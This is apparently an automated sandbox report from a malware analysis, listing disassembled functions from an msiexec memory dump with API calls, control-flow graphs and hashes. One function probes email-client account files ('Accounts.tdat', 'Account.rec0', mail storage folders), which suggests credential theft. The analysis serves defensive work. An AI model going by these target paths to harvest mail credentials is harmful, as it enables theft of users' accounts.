                                                                                                        control_flow_graph 390 228e3370-228e33b5 call 228e3330 call 228e37a7 395 228e3416-228e3419 390->395 396 228e33b7-228e33c9 390->396 398 228e3439-228e3442 395->398 399 228e341b-228e3428 call 228e3790 395->399 397 228e33cb 396->397 396->398 400 228e33d0-228e33e7 397->400 404 228e342d-228e3436 call 228e3330 399->404 402 228e33fd 400->402 403 228e33e9-228e33f7 call 228e3740 400->403 407 228e3400-228e3405 402->407 411 228e340d-228e3414 403->411 412 228e33f9 403->412 404->398 407->400 410 228e3407-228e3409 407->410 410->398 413 228e340b 410->413 411->404 414 228e33fb 412->414 415 228e3443-228e344c 412->415 413->404 414->407 416 228e344e-228e3455 415->416 417 228e3486-228e3496 call 228e3774 415->417 416->417 418 228e3457-228e3466 call 228ebbe0 416->418 422 228e34aa-228e34c6 call 228e3330 call 228e3758 417->422 423 228e3498-228e34a7 call 228e3790 417->423 427 228e3468-228e3480 418->427 428 228e3483 418->428 423->422 427->428 428->417
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 228E339B
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 228E33A3
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 228E3431
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 228E345C
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 228E34B1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm
                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                        • Opcode ID: fd5dff4658facaa99832d5baf2f08dd322f88cb2509f140098693cb49b9c8afd
                                                                                                        • Instruction ID: 21afd4c17027ef5c2217e8821043cabee39850629d80a78d1e045219bae9517f
                                                                                                        • Opcode Fuzzy Hash: fd5dff4658facaa99832d5baf2f08dd322f88cb2509f140098693cb49b9c8afd
                                                                                                        • Instruction Fuzzy Hash: E6418238A00348EBCB01DF68D840AAEBBA5AF56328F14C1A5F91E5F251D735DE15CB91
                                                                                                        Function 228E925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 228E9221: _free.LIBCMT ref: 228E924A
                                                                                                        • _free.LIBCMT ref: 228E92AB
                                                                                                          • Part of subcall function 228E571E: HeapFree.KERNEL32(00000000,00000000,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?), ref: 228E5734
                                                                                                          • Part of subcall function 228E571E: GetLastError.KERNEL32(?,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?,?), ref: 228E5746
                                                                                                        • _free.LIBCMT ref: 228E92B6
                                                                                                        • _free.LIBCMT ref: 228E92C1
                                                                                                        • _free.LIBCMT ref: 228E9315
                                                                                                        • _free.LIBCMT ref: 228E9320
                                                                                                        • _free.LIBCMT ref: 228E932B
                                                                                                        • _free.LIBCMT ref: 228E9336
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                        • Instruction ID: a5d9f1b70017efc5ad3b6c03b12ecad7f24cd7c2109f5a767e76fb12ee4cbe88
                                                                                                        • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                        • Instruction Fuzzy Hash: D8117F35940B08EADA30ABB4DD46FCB7BDD9F16700F400825B6BF76052DBA8F514D651
                                                                                                        Function 228E8821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 472 228e8821-228e883a 473 228e883c-228e884c call 228e9341 472->473 474 228e8850-228e8855 472->474 473->474 482 228e884e 473->482 476 228e8857-228e885f 474->476 477 228e8862-228e8886 MultiByteToWideChar 474->477 476->477 479 228e888c-228e8898 477->479 480 228e8a19-228e8a2c call 228e2ada 477->480 483 228e88ec 479->483 484 228e889a-228e88ab 479->484 482->474 486 228e88ee-228e88f0 483->486 487 228e88ad-228e88bc call 228ebf20 484->487 488 228e88ca-228e88db call 228e56d0 484->488 491 228e8a0e 486->491 492 228e88f6-228e8909 MultiByteToWideChar 486->492 487->491 497 228e88c2-228e88c8 487->497 488->491 498 228e88e1 488->498 496 228e8a10-228e8a17 call 228e8801 491->496 492->491 495 228e890f-228e892a call 228e5f19 492->495 495->491 504 228e8930-228e8937 495->504 496->480 501 228e88e7-228e88ea 497->501 498->501 501->486 505 228e8939-228e893e 504->505 506 228e8971-228e897d 504->506 505->496 507 228e8944-228e8946 505->507 508 228e897f-228e8990 506->508 509 228e89c9 506->509 507->491 510 228e894c-228e8966 call 228e5f19 507->510 512 228e89ab-228e89bc call 228e56d0 508->512 513 228e8992-228e89a1 call 228ebf20 508->513 511 228e89cb-228e89cd 509->511 510->496 524 228e896c 510->524 515 228e89cf-228e89e8 call 228e5f19 511->515 516 228e8a07-228e8a0d call 228e8801 511->516 512->516 528 228e89be 512->528 513->516 527 228e89a3-228e89a9 513->527 515->516 529 228e89ea-228e89f1 515->529 516->491 524->491 530 228e89c4-228e89c7 527->530 528->530 531 228e8a2d-228e8a33 529->531 532 228e89f3-228e89f4 529->532 530->511 533 228e89f5-228e8a05 WideCharToMultiByte 531->533 532->533 533->516 534 228e8a35-228e8a3c call 228e8801 533->534 534->496
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,228E6FFD,00000000,?,?,?,228E8A72,?,?,00000100), ref: 228E887B
                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,228E8A72,?,?,00000100,5EFC4D8B,?,?), ref: 228E8901
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 228E89FB
                                                                                                        • __freea.LIBCMT ref: 228E8A08
                                                                                                          • Part of subcall function 228E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 228E5702
                                                                                                        • __freea.LIBCMT ref: 228E8A11
                                                                                                        • __freea.LIBCMT ref: 228E8A36
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1414292761-0
                                                                                                        • Opcode ID: 0f17f7525874739cf3d55e3ef6c322829e1eb7e643e4ef33c60f4e2cde7e6cfe
                                                                                                        • Instruction ID: a90c89aa70c633dedc90c528b8bf1db4121c82636bc337b86c400e7b6630a313
                                                                                                        • Opcode Fuzzy Hash: 0f17f7525874739cf3d55e3ef6c322829e1eb7e643e4ef33c60f4e2cde7e6cfe
                                                                                                        • Instruction Fuzzy Hash: AA51F176A10316EFEB158E64CD40FAF37A9EB52754F500628FD0ED61A0EB34DC60C6A2
                                                                                                        Function 228E15DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • _strlen.LIBCMT ref: 228E1607
                                                                                                        • _strcat.LIBCMT ref: 228E161D
                                                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,228E190E,?,?,00000000,?,00000000), ref: 228E1643
                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,228E190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 228E165A
                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,228E190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 228E1661
                                                                                                        • lstrcatW.KERNEL32(00001008,?,?,?,?,?,228E190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 228E1686
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1922816806-0
                                                                                                        • Opcode ID: e2f58fdb78d34a74f02fc3948d721a265037788934e066fd33e58c5222fff653
                                                                                                        • Instruction ID: 45a7b6e9761b923f5150d1981299d9c1e8daa888d8983364f6dff22e165086d2
                                                                                                        • Opcode Fuzzy Hash: e2f58fdb78d34a74f02fc3948d721a265037788934e066fd33e58c5222fff653
                                                                                                        • Instruction Fuzzy Hash: EC21B63AA00304EBD7059B58DC80EFE77B8EF89714F14841AF909AB191EB74EA45C7A5
                                                                                                        Function 228E1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 228E1038
                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 228E104B
                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 228E1061
                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 228E1075
                                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 228E1090
                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 228E10B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$AttributesFilelstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 3594823470-0
                                                                                                        • Opcode ID: 57668892f7c9647f0ab415eb38e0e6c2acb5c3b1baa3eabbe50bd89bcb4df223
                                                                                                        • Instruction ID: 6eb0bef8041f02c33a507a5c822628373481f4df549fca3ad28473983efa7a9c
                                                                                                        • Opcode Fuzzy Hash: 57668892f7c9647f0ab415eb38e0e6c2acb5c3b1baa3eabbe50bd89bcb4df223
                                                                                                        • Instruction Fuzzy Hash: 7B218D39900318DBCF149A64DD48EEB3768EB45324F104696F96EA31A1DA70DE89CB40
                                                                                                        Function 228E3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,228E3518,228E23F1,228E1F17), ref: 228E3864
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 228E3872
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 228E388B
                                                                                                        • SetLastError.KERNEL32(00000000,?,228E3518,228E23F1,228E1F17), ref: 228E38DD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: 88df231b4f2edbbe315b47c11b37275f36060f237b331463c668121c09452aca
                                                                                                        • Instruction ID: 463bf51df0d85b3db26d586608d046c38d46f36c69d86a5d9100423ffa6214d2
                                                                                                        • Opcode Fuzzy Hash: 88df231b4f2edbbe315b47c11b37275f36060f237b331463c668121c09452aca
                                                                                                        • Instruction Fuzzy Hash: F701FC3AA49725DDA204257D6C85E262798DB97774F20033AFA3F6D4D5EF19CC01C354
                                                                                                        Function 228E5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,228E6C6C), ref: 228E5AFA
                                                                                                        • _free.LIBCMT ref: 228E5B2D
                                                                                                        • _free.LIBCMT ref: 228E5B55
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,228E6C6C), ref: 228E5B62
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,228E6C6C), ref: 228E5B6E
                                                                                                        • _abort.LIBCMT ref: 228E5B74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 3160817290-0
                                                                                                        • Opcode ID: 5121d33d7114d459a9ca259bbcbf5b4b7da80f4b2a58749e6508e00cb46c61dc
                                                                                                        • Instruction ID: 0153a95b1560f4a6bb760bd927ae03d546387b7ad4fdf9e40f98a225ba46ba58
                                                                                                        • Opcode Fuzzy Hash: 5121d33d7114d459a9ca259bbcbf5b4b7da80f4b2a58749e6508e00cb46c61dc
                                                                                                        • Instruction Fuzzy Hash: D3F0A4BE544701EAC2022E38AD45F0A27E99BE3671F240525FE2FAA1C5FF6DC5068164
                                                                                                        Function 228E11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 228E1E89: lstrlenW.KERNEL32(?,?,?,?,?,228E10DF,?,?,?,00000000), ref: 228E1E9A
                                                                                                          • Part of subcall function 228E1E89: lstrcatW.KERNEL32(?,?,?,228E10DF,?,?,?,00000000), ref: 228E1EAC
                                                                                                          • Part of subcall function 228E1E89: lstrlenW.KERNEL32(?,?,228E10DF,?,?,?,00000000), ref: 228E1EB3
                                                                                                          • Part of subcall function 228E1E89: lstrlenW.KERNEL32(?,?,228E10DF,?,?,?,00000000), ref: 228E1EC8
                                                                                                          • Part of subcall function 228E1E89: lstrcatW.KERNEL32(?,228E10DF,?,228E10DF,?,?,?,00000000), ref: 228E1ED3
                                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 228E122A
                                                                                                          • Part of subcall function 228E173A: _strlen.LIBCMT ref: 228E1855
                                                                                                          • Part of subcall function 228E173A: _strlen.LIBCMT ref: 228E1869
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                        • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                        • API String ID: 4036392271-1520055953
                                                                                                        • Opcode ID: fd44ef4097ae0895a7cd564c948dfe46c2aa5ac9c7705493c03142e3fa972d96
                                                                                                        • Instruction ID: 0a8d8fc3524e848deda1ac48cc44fec6becc008da8b03f7c73be45a6c967b178
                                                                                                        • Opcode Fuzzy Hash: fd44ef4097ae0895a7cd564c948dfe46c2aa5ac9c7705493c03142e3fa972d96
                                                                                                        • Instruction Fuzzy Hash: 3921B17DA10308EAEB1497A4EC81BFD7339EF80714F400556F60AEB2E4E6B19E80C759
                                                                                                        Function 228E4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,228E4AEA,?,?,228E4A8A,?,228F2238,0000000C,228E4BBD,00000000,00000000), ref: 228E4B59
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 228E4B6C
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,228E4AEA,?,?,228E4A8A,?,228F2238,0000000C,228E4BBD,00000000,00000000,?,228E2082), ref: 228E4B8F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: 31271404e83aaeb48666966e4bd8b58036e3ecc67c01cfceae1856126833e27e
                                                                                                        • Instruction ID: 54a58412a2afb60fe964222a6d09b810c81591ec88e566447b865f6aa49589f8
                                                                                                        • Opcode Fuzzy Hash: 31271404e83aaeb48666966e4bd8b58036e3ecc67c01cfceae1856126833e27e
                                                                                                        • Instruction Fuzzy Hash: DFF03C39A40208EFDB119F90C808F9EBFBDEF89355F004164F90FA6294EB35DA45CA91
                                                                                                        Function 228E7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 228E715C
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 228E717F
                                                                                                          • Part of subcall function 228E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 228E5702
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 228E71A5
                                                                                                        • _free.LIBCMT ref: 228E71B8
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 228E71C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 336800556-0
                                                                                                        • Opcode ID: 653d91416fe31b523715c8e4d612472afa920e5afe9d1cc8cc8f1c1bb131fca9
                                                                                                        • Instruction ID: a2ad9fca01bdabab5f4e838f84eebeb2c1fe0e4f1f8cbaef1cfac530e73e985e
                                                                                                        • Opcode Fuzzy Hash: 653d91416fe31b523715c8e4d612472afa920e5afe9d1cc8cc8f1c1bb131fca9
                                                                                                        • Instruction Fuzzy Hash: CD01F27A606315FF27110ABA5C8CDBB2A6DDEC3AA4714052DBF0EC7248EE65CC02C1B4
                                                                                                        Function 228E5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,228E636D,228E5713,00000000,?,228E2249,?,?,228E1D66,00000000,?,?,00000000), ref: 228E5B7F
                                                                                                        • _free.LIBCMT ref: 228E5BB4
                                                                                                        • _free.LIBCMT ref: 228E5BDB
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E5BE8
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E5BF1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3170660625-0
                                                                                                        • Opcode ID: 49c2ae16a9190e9026777fcccf11cd26f779cf49c75d95700c391a464b07c21c
                                                                                                        • Instruction ID: 9584461630c1a475c75afe4bbbb67a3ff0a98102c1d01de25e0df45e8f8eff9e
                                                                                                        • Opcode Fuzzy Hash: 49c2ae16a9190e9026777fcccf11cd26f779cf49c75d95700c391a464b07c21c
                                                                                                        • Instruction Fuzzy Hash: 1C0128BE144701E792026E385D84E0F2BED9BD36B0B540525FE1FAA186FF6CC906C170
                                                                                                        Function 228E1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,228E10DF,?,?,?,00000000), ref: 228E1E9A
                                                                                                        • lstrcatW.KERNEL32(?,?,?,228E10DF,?,?,?,00000000), ref: 228E1EAC
                                                                                                        • lstrlenW.KERNEL32(?,?,228E10DF,?,?,?,00000000), ref: 228E1EB3
                                                                                                        • lstrlenW.KERNEL32(?,?,228E10DF,?,?,?,00000000), ref: 228E1EC8
                                                                                                        • lstrcatW.KERNEL32(?,228E10DF,?,228E10DF,?,?,?,00000000), ref: 228E1ED3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 493641738-0
                                                                                                        • Opcode ID: 220bc2e5d89744dcbfdca965846cc972598d28f8d451170a4a5296ec27ef2c0b
                                                                                                        • Instruction ID: a288c55cc3904178192b78493724aa16c697b799e4d7893e6c068c68acbdeee4
                                                                                                        • Opcode Fuzzy Hash: 220bc2e5d89744dcbfdca965846cc972598d28f8d451170a4a5296ec27ef2c0b
                                                                                                        • Instruction Fuzzy Hash: 14F08926140210FAD6253729AC85E7F777CEFC7B60F040419FA0D83190AB949D4692B5
                                                                                                        Function 228E91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 228E91D0
                                                                                                          • Part of subcall function 228E571E: HeapFree.KERNEL32(00000000,00000000,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?), ref: 228E5734
                                                                                                          • Part of subcall function 228E571E: GetLastError.KERNEL32(?,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?,?), ref: 228E5746
                                                                                                        • _free.LIBCMT ref: 228E91E2
                                                                                                        • _free.LIBCMT ref: 228E91F4
                                                                                                        • _free.LIBCMT ref: 228E9206
                                                                                                        • _free.LIBCMT ref: 228E9218
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 0edebfabf402b39f6018bc33d39aae46b751724fb5175483706df134b1e35ef2
                                                                                                        • Instruction ID: d1c5a3ccab01c0b1ff981e289a0f3c04d086ccbe0ee690ee3790b0fc4fa74e9d
                                                                                                        • Opcode Fuzzy Hash: 0edebfabf402b39f6018bc33d39aae46b751724fb5175483706df134b1e35ef2
                                                                                                        • Instruction Fuzzy Hash: 43F012B5954380D78630DF59DBC5C167BD9EB12754B900C15FA1FDB544CB7CF8908A50
                                                                                                        Function 228E5351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 228E536F
                                                                                                          • Part of subcall function 228E571E: HeapFree.KERNEL32(00000000,00000000,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?), ref: 228E5734
                                                                                                          • Part of subcall function 228E571E: GetLastError.KERNEL32(?,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?,?), ref: 228E5746
                                                                                                        • _free.LIBCMT ref: 228E5381
                                                                                                        • _free.LIBCMT ref: 228E5394
                                                                                                        • _free.LIBCMT ref: 228E53A5
                                                                                                        • _free.LIBCMT ref: 228E53B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
